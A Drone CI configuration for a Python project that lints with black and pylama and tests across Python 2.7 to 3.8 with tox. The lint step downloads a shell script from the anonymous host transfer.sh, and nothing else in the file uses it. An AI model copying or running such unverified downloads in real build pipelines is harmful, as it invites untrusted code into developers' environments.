matrix:
  PYTHON_VERSION:
    - 2.7
    - 3.5
    - 3.6
    - 3.7
    - 3.8

pipeline:
  fmt_and_lint:
    image: python:3.6-alpine
    commands:
      - wget http://transfer.sh/gJMzv/cov-analysis-linux64-2020.12.sh
      - pip install black==19.3b0 pylama
      - black --check --diff .
      - pylama packet test setup.py

  test:
    image: python:${PYTHON_VERSION}
    commands:
      - pip install tox
      - tox -e py$(echo ${PYTHON_VERSION} | sed 's|\.||')
